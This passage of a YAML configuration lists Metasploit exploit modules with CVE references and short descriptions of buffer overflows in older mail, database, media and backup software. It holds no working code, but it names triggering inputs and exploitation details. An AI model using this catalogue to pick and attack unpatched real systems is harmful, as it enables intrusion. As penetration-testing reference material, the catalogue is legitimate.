exploit abuses an unpublished vulnerability in the\n\ + \t\t\t\tHP-UX LPD service. This flaw allows an unauthenticated\n\ + \t\t\t\tattacker to execute arbitrary commands with the privileges\n\ + \t\t\t\tof the root user. The LPD service is only exploitable when\n\ + \t\t\t\tthe address of the attacking system can be resolved by the\n\ + \t\t\t\ttarget. This vulnerability was silently patched with the\n\ + \t\t\t\tbuffer overflow flaws addressed in HP Security Bulletin\n\ + \t\t\t\tHPSBUX0208-213.\n\ + \t\t\t" + authors: + - - CVE + - 2002-1473 + - - OSVDB + - "9638" + - - URL + - http://archives.neohapsis.com/archives/hp/2002-q3/0064.html + path: extensions/metasploit/ + class: Msf_module +msf_ypops_overflow1: + enable: true + msf: true + msf_key: windows/smtp/ypops_overflow1 + name: YPOPS 0.6 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the YPOPS POP3\n\ + \t\t\t\tservice.\n\n\ + \t\t\t\tThis is a classic stack buffer overflow for YPOPS version 0.6.\n\ + \t\t\t\tPossibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n\ + \t\t\t\tjmp ebx opcode in ws_32.dll\n\ + \t\t\t" + authors: + - - CVE + - 2004-1558 + - - OSVDB + - "10367" + - - BID + - "11256" + - - URL + - http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html + path: extensions/metasploit/ + class: Msf_module +msf_wmailserver: + enable: true + msf: true + msf_key: windows/smtp/wmailserver + name: SoftiaCom WMailserver 1.0 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n\ + \t\t\t\t(SMTP) via a SEH frame overwrite.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2287 + - - OSVDB + - "17883" + - - BID + - "14213" + path: extensions/metasploit/ + class: Msf_module +msf_ms03_046_exchange2000_xexch50: + enable: true + msf: true + msf_key: windows/smtp/ms03_046_exchange2000_xexch50 + name: MS03-046 Exchange 2000 XEXCH50 Heap Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the Exchange 2000 heap overflow. Due\n\ + \t\t\t\tto the nature of the vulnerability, this exploit is not very\n\ + \t\t\t\treliable. This module has been tested against Exchange 2000\n\ + \t\t\t\tSP0 and SP3 running a Windows 2000 system patched to SP4. It\n\ + \t\t\t\tnormally takes between one and 100 connection attempts to\n\ + \t\t\t\tsuccessfully obtain a shell. This exploit is *very* unreliable.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0714 + - - BID + - "8838" + - - OSVDB + - "2674" + - - MSB + - MS03-046 + - - URL + - http://www.milw0rm.com/exploits/113 + path: extensions/metasploit/ + class: Msf_module +msf_mercury_cram_md5: + enable: true + msf: true + msf_key: windows/smtp/mercury_cram_md5 + name: Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n\ + \t\t\t\tBy sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n\ + \t\t\t\tmay be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4440 + - - OSVDB + - "39669" + - - BID + - "25357" + path: extensions/metasploit/ + class: Msf_module +msf_mailcarrier_smtp_ehlo: + enable: true + msf: true + msf_key: windows/smtp/mailcarrier_smtp_ehlo + name: TABS MailCarrier v2.51 SMTP EHLO Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the MailCarrier v2.51 suite SMTP service.\n\ + \t\t\t\tThe stack is overwritten when sending an overly long EHLO command.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1638 + - - OSVDB + - "11174" + - - BID + - "11535" + - - URL + - http://milw0rm.com/exploits/598 + path: extensions/metasploit/ + class: Msf_module +msf_fb_isc_attach_database: + enable: true + msf: true + msf_key: windows/misc/fb_isc_attach_database + name: Firebird Relational Database isc_attach_database() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted create request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38607" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_splayer_content_type: + enable: true + msf: true + msf_key: windows/misc/splayer_content_type + name: SPlayer 3.7 Content-Type Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in SPlayer v3.7 or piror. When SPlayer\n\ + \t\t\t\trequests the URL of a media file (video or audio), it is possible to gain arbitrary\n\ + \t\t\t\tremote code execution due to a buffer overflow caused by an exceeding length of data\n\ + \t\t\t\tas the 'Content-Type' parameter.\n\ + \t\t\t" + authors: + - - OSVDB + - "72181" + - - URL + - http://www.exploit-db.com/exploits/17243/ + path: extensions/metasploit/ + class: Msf_module +msf_bomberclone_overflow: + enable: true + msf: true + msf_key: windows/misc/bomberclone_overflow + name: Bomberclone 0.11.6 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n\ + \t\t\t\tThe return address is overwritten with lstrcpyA memory address,\n\ + \t\t\t\tthe second and third value are the destination buffer,\n\ + \t\t\t\tthe fourth value is the source address of our buffer in the stack.\n\ + \t\t\t\tThis exploit is like a return in libc.\n\n\ + \t\t\t\tATTENTION\n\ + \t\t\t\tThe shellcode is exec ONLY when someone try to close bomberclone.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0460 + - - OSVDB + - "23263" + - - BID + - "16697" + - - URL + - http://www.frsirt.com/english/advisories/2006/0643 + path: extensions/metasploit/ + class: Msf_module +msf_mirc_privmsg_server: + enable: true + msf: true + msf_key: windows/misc/mirc_privmsg_server + name: mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n\ + \t\t\t\tBy enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n\ + \t\t\t\tcommand can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n\ + \t\t\t\tmay be necessary. This module is based on the code by SkD.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4449 + - - OSVDB + - "48752" + - - BID + - "31552" + - - URL + - http://www.milw0rm.com/exploits/6666 + path: extensions/metasploit/ + class: Msf_module +msf_ibm_tsm_rca_dicugetidentify: + enable: true + msf: true + msf_key: windows/misc/ibm_tsm_rca_dicugetidentify + name: IBM Tivoli Storage Manager Express RCA Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n\ + \t\t\t\tClient Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n\ + \t\t\t\tNodeName parameter, an attacker can execute arbitrary code.\n\n\ + \t\t\t\tNOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n\ + \t\t\t\tthe port number on which it runs. This service does not restart.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4828 + - - OSVDB + - "54232" + - - BID + - "34803" + path: extensions/metasploit/ + class: Msf_module +msf_nettransport: + enable: true + msf: true + msf_key: windows/misc/nettransport + name: NetTransport Download Manager 2.90.510 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a stack buffer overflow in NetTransport Download Manager,\n\ + \t\t\t\tpart of the NetXfer suite. This module was tested\n\ + \t\t\t\tsuccessfully against version 2.90.510.\n\ + \t\t\t" + authors: + - - OSVDB + - "61435" + - - URL + - http://www.exploit-db.com/exploits/10911 + path: extensions/metasploit/ + class: Msf_module +msf_poppeeper_date: + enable: true + msf: true + msf_key: windows/misc/poppeeper_date + name: POP Peeper v3.4 DATE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in POP Peeper v3.4.\n\ + \t\t\t\tWhen a specially crafted DATE string is sent to a client,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code. This\n\ + \t\t\t\tmodule is based off of krakowlabs code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1029 + - - OSVDB + - "53560" + - - BID + - "34093" + - - URL + - http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt + path: extensions/metasploit/ + class: Msf_module +msf_bigant_server_250: + enable: true + msf: true + msf_key: windows/misc/bigant_server_250 + name: BigAnt Server 2.50 SP1 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis exploits a stack buffer overflow in the BigAnt Messaging Service,\n\ + \t\t\t\tpart of the BigAnt Server product suite. This module was tested\n\ + \t\t\t\tsuccessfully against version 2.50 SP1.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1914 + - - OSVDB + - "44454" + - - URL + - http://www.exploit-db.com/exploits/9673 + - - URL + - http://www.exploit-db.com/exploits/9690 + path: extensions/metasploit/ + class: Msf_module +msf_ib_isc_attach_database: + enable: true + msf: true + msf_key: windows/misc/ib_isc_attach_database + name: Borland InterBase isc_attach_database() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted attach request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38607" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_hp_ovtrace: + enable: true + msf: true + msf_key: windows/misc/hp_ovtrace + name: HP OpenView Operations OVTrace Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n\ + \t\t\t\tBy sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3872 + - - OSVDB + - "39527" + - - BID + - "25255" + path: extensions/metasploit/ + class: Msf_module +msf_ib_svc_attach: + enable: true + msf: true + msf_key: windows/misc/ib_svc_attach + name: Borland InterBase SVC_attach() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted service attach request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38605" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_mercury_phonebook: + enable: true + msf: true + msf_key: windows/misc/mercury_phonebook + name: Mercury/32 <= v4.01b PH Server Module Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in\n\ + \t\t\t\tMercury/32 <= v4.01b PH Server Module. This issue is\n\ + \t\t\t\tdue to a failure of the application to properly bounds check\n\ + \t\t\t\tuser-supplied data prior to copying it to a fixed size memory buffer.\n\ + \t\t\t" + authors: + - - CVE + - 2005-4411 + - - OSVDB + - "22103" + - - BID + - "16396" + path: extensions/metasploit/ + class: Msf_module +msf_bigant_server_usv: + enable: true + msf: true + msf_key: windows/misc/bigant_server_usv + name: BigAnt Server 2.52 USV Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis exploits a stack buffer overflow in the BigAnt Messaging Service,\n\ + \t\t\t\tpart of the BigAnt Server product suite. This module was tested\n\ + \t\t\t\tsuccessfully against version 2.52.\n\n\ + \t\t\t\tNOTE: The AntServer service does not restart, you only get one shot.\n\ + \t\t\t" + authors: + - - OSVDB + - "61386" + - - URL + - http://www.exploit-db.com/exploits/10765 + - - URL + - http://www.exploit-db.com/exploits/10973 + path: extensions/metasploit/ + class: Msf_module +msf_asus_dpcproxy_overflow: + enable: true + msf: true + msf_key: windows/misc/asus_dpcproxy_overflow + name: Asus Dpcproxy Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n\ + \t\t\t\t\tIt should be vulnerable until version 2.0.0.24.\n\ + \t\t\t\t\tCredit to Luigi Auriemma\n\ + \t\t\t" + authors: + - - CVE + - 2008-1491 + - - OSVDB + - "43638" + - - BID + - "28394" + path: extensions/metasploit/ + class: Msf_module +msf_ib_isc_create_database: + enable: true + msf: true + msf_key: windows/misc/ib_isc_create_database + name: Borland InterBase isc_create_database() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted create request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38606" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_apple_quicktime_rtsp_response: + enable: true + msf: true + msf_key: windows/misc/apple_quicktime_rtsp_response + name: Apple QuickTime 7.3 RTSP Response Header Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n\ + \t\t\t\tRTSP response to a client, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-6166 + - - OSVDB + - "40876" + - - BID + - "26549" + - - URL + - http://milw0rm.com/exploits/4648 + path: extensions/metasploit/ + class: Msf_module +msf_ms07_064_sami: + enable: true + msf: true + msf_key: windows/misc/ms07_064_sami + name: Microsoft DirectX DirectShow SAMI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the DirectShow Synchronized\n\ + \t\t\t\tAccessible Media Interchanged (SAMI) parser in quartz.dll. This module\n\ + \t\t\t\thas only been tested with Windows Media Player (6.4.09.1129) and\n\ + \t\t\t\tDirectX 8.0.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3901 + - - OSVDB + - "39126" + - - MSB + - MS07-064 + - - BID + - "26789" + path: extensions/metasploit/ + class: Msf_module +msf_sap_2005_license: + enable: true + msf: true + msf_key: windows/misc/sap_2005_license + name: SAP Business One License Manager 2005 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the SAP Business One 2005\n\ + \t\t\t\t\tLicense Manager 'NT Naming Service' A and B releases. By sending an\n\ + \t\t\t\t\texcessively long string the stack is overwritten enabling arbitrary\n\ + \t\t\t\t\tcode execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "56837" + - - CVE + - 2009-4988 + - - BID + - "35933" + - - URL + - http://www.milw0rm.com/exploits/9319 + path: extensions/metasploit/ + class: Msf_module +msf_wireshark_packet_dect: + enable: true + msf: true + msf_key: windows/fileformat/wireshark_packet_dect + name: Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Wireshark <= 1.4.4\n\ + \t\t\t\tWhen opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n\ + \t\t\t\tresulting in arbitrary code execution.\n\n\ + \t\t\t\tNote: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\"))\n\ + \t\t\t" + authors: + - - CVE + - 2011-1591 + - - OSVDB + - "71848" + - - URL + - https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838 + - - URL + - https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836 + - - URL + - http://www.exploit-db.com/exploits/17185 + path: extensions/metasploit/ + class: Msf_module +msf_hp_omniinet_3: + enable: true + msf: true + msf_key: windows/misc/hp_omniinet_3 + name: HP OmniInet.exe Opcode 27 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\n\ + \t\t\t\tOmniInet NT Service. By sending a specially crafted opcode 27 packet,\n\ + \t\t\t\ta remote attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1865 + - - OSVDB + - "73571" + - - URL + - http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities + path: extensions/metasploit/ + class: Msf_module +msf_agentxpp_receive_agentx: + enable: true + msf: true + msf_key: windows/misc/agentxpp_receive_agentx + name: AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a stack buffer overflow in the AgentX++ library, as used by\n\ + \t\t\t\tvarious applications. By sending a specially crafted request, an attacker can\n\ + \t\t\t\texecute arbitrary code, potentially with SYSTEM privileges.\n\n\ + \t\t\t\tThis module was tested successfully against master.exe as included with Real\n\ + \t\t\t\tNetwork\\'s Helix Server v12. When installed as a service with Helix Server,\n\ + \t\t\t\tthe service runs as SYSTEM, has no recovery action, but will start automatically\n\ + \t\t\t\ton boot.\n\n\ + \t\t\t\tThis module does not work with NX/XD enabled but could be modified easily to\n\ + \t\t\t\tdo so. The address\n\ + \t\t\t" + authors: + - - CVE + - 2010-1318 + - - OSVDB + - "63919" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867 + path: extensions/metasploit/ + class: Msf_module +msf_citrix_streamprocess: + enable: true + msf: true + msf_key: windows/misc/citrix_streamprocess + name: Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n\ + \t\t\t\tBy sending a specially crafted packet to the Provisioning Services server, a fixed\n\ + \t\t\t\tlength buffer on the stack can be overflowed and arbitrary code can be executed.\n\ + \t\t\t" + authors: + - - OSVDB + - "70597" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-023/ + - - URL + - http://secunia.com/advisories/42954/ + - - URL + - http://support.citrix.com/article/CTX127149 + path: extensions/metasploit/ + class: Msf_module +msf_landesk_aolnsrvr: + enable: true + msf: true + msf_key: windows/misc/landesk_aolnsrvr + name: LANDesk Management Suite 8.7 Alert Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n\ + \t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\n\ + \t\t\t\tcode can be executed.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1674 + - - OSVDB + - "34964" + - - URL + - http://www.tippingpoint.com/security/advisories/TSRT-07-04.html + path: extensions/metasploit/ + class: Msf_module +msf_shixxnote_font: + enable: true + msf: true + msf_key: windows/misc/shixxnote_font + name: ShixxNOTE 6.net Font Field Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in ShixxNOTE 6.net.\n\ + \t\t\t\tThe vulnerability is caused due to boundary errors in the\n\ + \t\t\t\thandling of font fields.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1595 + - - OSVDB + - "10721" + - - BID + - "11409" + path: extensions/metasploit/ + class: Msf_module +msf_hp_omniinet_1: + enable: true + msf: true + msf_key: windows/misc/hp_omniinet_1 + name: HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\n\ + \t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n\ + \t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\n\ + \t\t\t\tprivileges.\n\n\ + \t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\n\ + \t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\n\ + \t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n\ + \t\t\t\tof Application Recovery Manager.\n\n\ + \t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\n\ + \t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\n\ + \t\t\t\texploits the first one.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2280 + - - BID + - "37396" + - - OSVDB + - "61206" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-099 + path: extensions/metasploit/ + class: Msf_module +msf_realtek_playlist: + enable: true + msf: true + msf_key: windows/misc/realtek_playlist + name: Realtek Media Player Playlist Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n\ + \t\t\t\tWhen a Realtek Media Player client opens a specially crafted playlist, an\n\ + \t\t\t\tattacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5664 + - - OSVDB + - "50715" + - - BID + - "32860" + path: extensions/metasploit/ + class: Msf_module +msf_talkative_response: + enable: true + msf: true + msf_key: windows/misc/talkative_response + name: Talkative IRC v0.4.4.16 Response Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n\ + \t\t\t\tWhen a specially crafted response string is sent to a client,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "64582" + - - BID + - "34141" + - - URL + - http://milw0rm.com/exploits/8227 + path: extensions/metasploit/ + class: Msf_module +msf_borland_starteam: + enable: true + msf: true + msf_key: windows/misc/borland_starteam + name: Borland CaliberRM StarTeam Multicast Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n\ + \t\t\t\ta specially crafted GET request to the STMulticastService, an attacker may be\n\ + \t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0311 + - - OSVDB + - "44039" + - - BID + - "28602" + path: extensions/metasploit/ + class: Msf_module +msf_eiqnetworks_esa_topology: + enable: true + msf: true + msf_key: windows/misc/eiqnetworks_esa_topology + name: eIQNetworks ESA Topology DELETEDEVICE Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in eIQnetworks\n\ + \t\t\t\tEnterprise Security Analyzer. During the processing of\n\ + \t\t\t\tlong arguments to the DELETEDEVICE command in the Topology\n\ + \t\t\t\tserver, a stack-based buffer overflow occurs.\n\n\ + \t\t\t\tThis module has only been tested against ESA v2.1.13.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3838 + - - OSVDB + - "27528" + - - BID + - "19164" + path: extensions/metasploit/ + class: Msf_module +msf_bigant_server: + enable: true + msf: true + msf_key: windows/misc/bigant_server + name: BigAnt Server 2.2 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in BigAnt Server 2.2.\n\ + \t\t\t\tBy sending a specially crafted packet, an attacker may be\n\ + \t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1914 + - - OSVDB + - "44454" + - - BID + - "28795" + path: extensions/metasploit/ + class: Msf_module +msf_fb_isc_create_database: + enable: true + msf: true + msf_key: windows/misc/fb_isc_create_database + name: Firebird Relational Database isc_create_database() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\ + \t\t\t\tby sending a specially crafted create request.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5243 + - - OSVDB + - "38606" + - - BID + - "25917" + - - URL + - http://www.risesecurity.org/advisories/RISE-2007002.txt + path: extensions/metasploit/ + class: Msf_module +msf_poppeeper_uidl: + enable: true + msf: true + msf_key: windows/misc/poppeeper_uidl + name: POP Peeper v3.4 UIDL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in POP Peeper v3.4.\n\ + \t\t\t\tWhen a specially crafted UIDL string is sent to a client,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code. This\n\ + \t\t\t\tmodule is based off of krakowlabs code.\n\ + \t\t\t" + authors: + - - OSVDB + - "53559" + - - CVE + - 2009-1029 + - - BID + - "33926" + - - URL + - http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt + path: extensions/metasploit/ + class: Msf_module +msf_ibm_tsm_cad_ping: + enable: true + msf: true + msf_key: windows/misc/ibm_tsm_cad_ping + name: IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n\ + \t\t\t\tBy sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n\ + \t\t\t\tNOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n\ + \t\t\t\tfor the vulnerable code to be reached. This state doesn't appear to be reachable when the\n\ + \t\t\t\tTSM server is not running. This service does not restart.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3853 + - - OSVDB + - "59632" + path: extensions/metasploit/ + class: Msf_module +msf_bakbone_netvault_heap: + enable: true + msf: true + msf_key: windows/misc/bakbone_netvault_heap + name: BakBone NetVault Remote Heap Overflow + category: Metasploit + description: "\n\ + \t\tThis module exploits a heap overflow in the BakBone NetVault\n\ + \tProcess Manager service. This code is a direct port of the netvault.c\n\ + \tcode written by nolimit and BuzzDee.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1009 + - - OSVDB + - "15234" + - - BID + - "12967" + path: extensions/metasploit/ + class: Msf_module +msf_hp_omniinet_4: + enable: true + msf: true + msf_key: windows/misc/hp_omniinet_4 + name: HP OmniInet.exe Opcode 20 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\n\ + \t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\n\ + \t\t\t\ta buffer overflow can occur when this data is being written on the stack where\n\ + \t\t\t\tno proper bounds checking is done beforehand, which results arbitrary code\n\ + \t\t\t\texecution under the context of SYSTEM. This module is also made against systems\n\ + \t\t\t\tsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n\ + \t\t\t\tenabled by default.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1865 + - - OSVDB + - "73571" + - - URL + - http://www.exploit-db.com/exploits/17468/ + - - URL + - http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 + path: extensions/metasploit/ + class: Msf_module +msf_eiqnetworks_esa: + enable: true + msf: true + msf_key: windows/misc/eiqnetworks_esa + name: eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in eIQnetworks\n\ + \t\t\t\tEnterprise Security Analyzer. During the processing of\n\ + \t\t\t\tlong arguments to the LICMGR_ADDLICENSE command, a stack-based\n\ + \t\t\t\tbuffer overflow occurs. This module has only been tested\n\ + \t\t\t\tagainst ESA v2.1.13.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3838 + - - OSVDB + - "27526" + - - BID + - "19163" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-06-024.html + path: extensions/metasploit/ + class: Msf_module +msf_tiny_identd_overflow: + enable: true + msf: true + msf_key: windows/misc/tiny_identd_overflow + name: TinyIdentD 2.2 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack based buffer overflow in TinyIdentD version 2.2.\n\ + \t\t\t\tIf we send a long string to the ident service we can overwrite the return\n\ + \t\t\t\taddress and execute arbitrary code. Credit to Maarten Boone.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2711 + - - OSVDB + - "36053" + - - BID + - "23981" + path: extensions/metasploit/ + class: Msf_module +msf_windows_rsh: + enable: true + msf: true + msf_key: windows/misc/windows_rsh + name: Windows RSH daemon Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerabliltiy in Windows RSH daemon 1.8.\n\ + \t\t\t\tThe vulnerability is due to a failure to check for the length of input sent\n\ + \t\t\t\tto the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit\n\ + \t\t\t\tto be successful.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4006 + - - OSVDB + - "38572" + - - BID + - "25044" + path: extensions/metasploit/ + class: Msf_module +msf_hp_omniinet_2: + enable: true + msf: true + msf_key: windows/misc/hp_omniinet_2 + name: HP OmniInet.exe MSG_PROTOCOL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\n\ + \t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n\ + \t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\n\ + \t\t\t\tprivileges.\n\n\ + \t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\n\ + \t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\n\ + \t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n\ + \t\t\t\tof Application Recovery Manager.\n\n\ + \t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\n\ + \t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\n\ + \t\t\t\texploits the second one.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3844 + - - BID + - "37250" + - - OSVDB + - "60852" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-091 + path: extensions/metasploit/ + class: Msf_module +msf_eureka_mail_err: + enable: true + msf: true + msf_key: windows/misc/eureka_mail_err + name: Eureka Email 2.2q ERR Remote Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow in the Eureka Email 2.2q\n\ + \t\t\t\tclient that is triggered through an excessively long ERR message.\n\n\ + 